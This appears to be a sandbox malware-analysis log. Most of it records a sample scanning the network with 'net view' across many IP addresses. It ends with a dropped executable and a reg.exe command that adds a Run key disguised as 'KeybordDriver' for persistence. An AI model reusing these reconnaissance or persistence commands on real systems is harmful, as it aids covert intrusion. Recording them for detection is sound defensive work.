C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3911⤵PID:7020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7248
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1711⤵PID:7092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7628
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.111⤵PID:7128
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:7636
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5411⤵
- Discovers systems in the same network
PID:21224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:23600
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3811⤵
- Discovers systems in the same network
PID:23136 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:23680
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5511⤵PID:23168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:21972
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3711⤵PID:23276
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:22744
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5611⤵PID:23380
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:22892
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3611⤵PID:23420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:21516
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5711⤵PID:23304
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:23784
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3511⤵
- Discovers systems in the same network
PID:23732 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:23476
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5811⤵PID:23700
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:22984
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3411⤵PID:23072
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:23792
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.5911⤵
- System Location Discovery: System Language Discovery
PID:20376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:21180
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3311⤵PID:20296
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:21652
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1811⤵
- Discovers systems in the same network
PID:20556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:20416
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.011⤵PID:20500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:20248
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.1911⤵
- Discovers systems in the same network
PID:20464 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:20160
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25511⤵PID:20400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:18792
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2011⤵PID:24612
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:25056
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25411⤵PID:24640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:24992
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6011⤵PID:24716
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:19604
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3211⤵
- Discovers systems in the same network
PID:19424 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:19468
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6111⤵
- System Location Discovery: System Language Discovery
PID:25112 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:25160
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3111⤵
- Discovers systems in the same network
PID:25128 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:25156
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2111⤵PID:26960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26132
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25311⤵PID:25912
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26084
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2211⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:25956 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:25504
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25211⤵PID:26060
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:25516
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6211⤵
- Discovers systems in the same network
PID:26312 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26328
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.3011⤵
- System Location Discovery: System Language Discovery
PID:26320 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26340
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2311⤵PID:26484
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26536
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25111⤵PID:26480
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:26532
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2411⤵PID:27408
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:27596
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.25011⤵PID:27432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:27440
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6311⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:13108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:27364
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2911⤵PID:27368
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:27344
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6411⤵PID:29036
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:29128
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2811⤵PID:29116
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:29136
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2511⤵
- Discovers systems in the same network
PID:28488 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:18164
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24911⤵
- System Location Discovery: System Language Discovery
PID:28456 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:28628
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2611⤵
- System Location Discovery: System Language Discovery
PID:29624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:28904
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24811⤵
- Discovers systems in the same network
PID:29312 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:18108
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6511⤵PID:28960
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:29748
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2711⤵PID:29676
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:14084
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6611⤵PID:18048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:31068
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2611⤵
- Discovers systems in the same network
PID:18044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:29740
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6711⤵PID:30808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:30764
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2511⤵PID:30780
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:30772
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6811⤵PID:31636
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:31644
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2411⤵PID:31440
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:31588
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.6911⤵
- Discovers systems in the same network
PID:32124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:32132
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2311⤵
- Discovers systems in the same network
PID:32260 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:11944
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7011⤵PID:34092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:34148
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2211⤵
- System Location Discovery: System Language Discovery
PID:34104 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:34112
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7111⤵
- Discovers systems in the same network
PID:34832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:35288
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2111⤵PID:34992
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6396
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2711⤵
- Discovers systems in the same network
PID:35124 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:35120
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24711⤵
- Discovers systems in the same network
PID:35212 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:35236
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2811⤵PID:36552
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:36916
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7211⤵PID:36564
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:34212
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24611⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:2088 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:36964
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.2011⤵PID:36672
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:36660
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7311⤵
- Discovers systems in the same network
PID:38484 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:38344
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.2911⤵
- System Location Discovery: System Language Discovery
PID:38200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:38156
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1911⤵
- System Location Discovery: System Language Discovery
PID:38152 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:38128
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24511⤵
- System Location Discovery: System Language Discovery
PID:38120 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:38216
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7411⤵PID:39020
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:39060
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1811⤵PID:39048
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:39052
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3011⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:39632 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:39684
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24411⤵PID:38920
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:38936
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7511⤵
- System Location Discovery: System Language Discovery
PID:37904 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2652
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1711⤵PID:39808
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:16340
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7611⤵
- Discovers systems in the same network
PID:41144 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:41252
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1611⤵PID:41172
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:16216
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7711⤵
- Discovers systems in the same network
PID:41360 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:41464
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1511⤵
- System Location Discovery: System Language Discovery
PID:41300 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:41524
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7811⤵
- Discovers systems in the same network
PID:17800 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:44008
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1411⤵PID:16052
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:34888
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3111⤵
- Discovers systems in the same network
PID:43828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:35376
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24311⤵PID:43692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:43532
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.7911⤵PID:42940
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:42852
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1311⤵PID:42828
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:42896
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3211⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:42832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:42860
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24211⤵PID:42880
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:42884
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8011⤵PID:16256
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:17032
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1211⤵PID:17256
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:16756
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3311⤵
- System Location Discovery: System Language Discovery
PID:34820 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13808
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24111⤵
- Discovers systems in the same network
PID:12992 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:13860
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3411⤵PID:14104
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:14324
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.24011⤵
- System Location Discovery: System Language Discovery
PID:14200 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:14616
-
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3511⤵
- Discovers systems in the same network
PID:12600
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23911⤵PID:12496
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3611⤵PID:19372
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23811⤵PID:8548
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23711⤵PID:8180
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8111⤵PID:19380
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3711⤵PID:19244
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1111⤵PID:8464
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3811⤵PID:19348
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23611⤵PID:3760
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8211⤵PID:17392
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.1011⤵PID:17692
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.3911⤵PID:16544
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23511⤵
- Discovers systems in the same network
PID:23840
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8311⤵
- Discovers systems in the same network
PID:16380
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.911⤵PID:17636
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8411⤵
- Discovers systems in the same network
PID:16236
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.811⤵
- Discovers systems in the same network
PID:17400
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4011⤵PID:15632
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23411⤵PID:16804
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8511⤵PID:14716
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.711⤵PID:14500
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4111⤵
- Discovers systems in the same network
PID:8080
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8611⤵PID:8024
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23311⤵PID:7944
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.611⤵
- Discovers systems in the same network
PID:8104
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4211⤵
- Discovers systems in the same network
PID:4984
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23211⤵
- Discovers systems in the same network
PID:5804
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8711⤵PID:2488
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.511⤵PID:5392
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4311⤵PID:6400
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23111⤵PID:6716
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8811⤵PID:1248
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.411⤵PID:4128
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4411⤵PID:6556
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.23011⤵PID:6824
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.8911⤵PID:19680
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.311⤵PID:6952
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4511⤵PID:19808
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22911⤵
- Discovers systems in the same network
PID:19856
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4611⤵PID:21024
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22811⤵PID:20904
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9011⤵PID:23620
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.211⤵
- Discovers systems in the same network
PID:23544
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4711⤵PID:21468
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22711⤵PID:23412
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9111⤵
- Discovers systems in the same network
PID:13840
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.111⤵PID:22612
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4811⤵PID:20788
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22611⤵PID:21740
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9211⤵
- Discovers systems in the same network
PID:18636
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.011⤵
- Discovers systems in the same network
PID:18600
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.4911⤵PID:19160
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22511⤵
- Discovers systems in the same network
PID:24816
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9311⤵
- Discovers systems in the same network
PID:24928
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25511⤵PID:25316
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9411⤵PID:25424
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25411⤵PID:25468
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9511⤵PID:27928
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25311⤵PID:25840
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9611⤵PID:26468
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25211⤵PID:26456
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9711⤵PID:13548
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25111⤵PID:27048
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9811⤵PID:27144
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.25011⤵PID:27132
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.9911⤵PID:27672
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24911⤵PID:27976
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.5011⤵PID:28680
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22411⤵PID:28076
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10011⤵
- Discovers systems in the same network
PID:28464
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24811⤵
- Discovers systems in the same network
PID:28496
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10111⤵PID:29160
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24711⤵PID:28852
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10211⤵PID:25640
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24611⤵PID:25604
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10311⤵
- Discovers systems in the same network
PID:30124
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24511⤵PID:29832
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10411⤵PID:31056
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24411⤵PID:30904
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10511⤵PID:30008
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24311⤵
- Discovers systems in the same network
PID:30028
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.1.10611⤵PID:30560
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.5111⤵PID:31444
-
-
C:\Windows\SysWOW64\net.exe"net" view \\10.127.0.24211⤵PID:31656
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22311⤵PID:31240
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.5211⤵PID:10908
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22211⤵PID:4060
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.102.5311⤵PID:38496
-
-
C:\Windows\SysWOW64\net.exe"net" view \\131.216.101.22111⤵PID:32028
-
-
-
C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe"C:\Users\Admin\AppData\Roaming\Windows Objects\wmisecure64.exe" autorun10⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:3100 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
